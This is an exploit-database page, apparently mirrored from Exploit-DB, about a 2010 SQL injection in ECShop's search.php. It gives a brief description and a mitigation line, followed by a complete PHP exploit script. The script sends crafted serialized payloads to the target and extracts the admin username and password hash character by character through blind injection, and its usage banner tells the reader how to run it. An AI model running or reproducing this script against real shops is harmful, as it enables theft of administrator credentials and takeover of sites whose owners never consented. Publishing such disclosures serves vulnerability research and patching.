header-logo
Suggest Exploit
vendor:
ECShop
by:
Jannock
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ECShop
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: YES
Related CWE: WAVDB-01606
CPE: ecshop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

ECShop Search.php SQL Injection Exploit

ECShop Search.php SQL Injection Exploit is a vulnerability that allows an attacker to inject malicious SQL code into the application, which can be used to gain access to sensitive data stored in the database. The exploit is triggered when the application fails to properly sanitize user input, allowing the attacker to inject malicious SQL code into the application. The exploit was discovered in 2010 by Jannock and affects all versions of ECShop. The Common Weakness Enumeration (CWE) for this vulnerability is CWE-89.

Mitigation:

The best way to mitigate this vulnerability is to properly sanitize user input and ensure that all user input is properly validated before being used in any SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: ECShop Search.php SQL Injection Exploit
# Date: 2010-05-17
# Author: Jannock
# Software Link: http://www.ecshop.com
# Version: ECShop All Version
# Tested on:
# CVE :
# WAVDB: WAVDB-01606
# Code :

<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
global $argv;
exit(
"\n--+++============================================================+++--".
"\n--+++====== ECShop Search.php SQL Injection Exploit========+++--".
"\n--+++============================================================+++--".
"\n\n[+] Author: jannock".
"\n[+] Team: [url]http://wavdb.com/[/url]".
"\n[+] Usage: php ".$argv[0]." <hostname> <path> <goods_id>".
"\n[+] Ex.: php ".$argv[0]." localhost / 1".
"\n\n");
}

function query($pos, $chr, $chs,$goodid)
{
switch ($chs){
case 0:
$query = "1=1";
break;
case 1:
$query = " ascii(substring((select user_name from ecs_admin_user limit
0,1),{$pos},1))={$chr}";
break;
case 2:
$query = " ascii(substring((select password from ecs_admin_user limit
0,1),{$pos},1))={$chr}";
break;
case 3:
$query = " length((select user_name from ecs_admin_user limit 0,1))={$pos}";
break;
}
$list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1'
union select $goodid,1 from ecs_admin_user where 1=1 and ". $query
."/*"=>"1");
$query = array("attr"=>$list);
$query = str_replace('+', '%2b', base64_encode(serialize($query)));
return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs,$goodid)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);

$message = "GET ".$path."/search.php?encode=".query($pos, $chr,
$chs,$goodid)." HTTP/1.1\r\n";
$message .= "Host: $hostname\r\n";
$message .= "Connection: Close\r\n\r\n";

fwrite($conn, $message);
while (!feof($conn))
{
$reply .= fgets($conn, 1024);
}
fclose($conn);
return $reply;
}


function crkusername($hostname, $path, $chs,$goodid)
{
global $length;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);

if (preg_match ("/javascript:addToCart/i", $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function crkpassword($hostname, $path, $chs,$goodid)
{
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 32)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
if (preg_match ("/javascript:addToCart/i", $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n\n";
}

function lengthcolumns($hostname, $path,$chs, $goodid)
{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);
if (preg_match ("/javascript:addToCart/i", $response))
{
$exit = 1;
$length = $pos;
break;
}
else
{
$pos++;
if($pos>20)
{
exit("Exploit failed");
}
}
}
echo $length."\n";
return $length;
}


if ($argc != 4)
usage();
$hostname = $argv[1];
$path = $argv[2];
$goodid = $argv[3];
$length = lengthcolumns($hostname, $path, 3, $goodid);
crkusername($hostname, $path, 1,$goodid);
crkpassword($hostname, $path, 2,$goodid);

?>

Navigation

Suggest Exploit

Services By CQR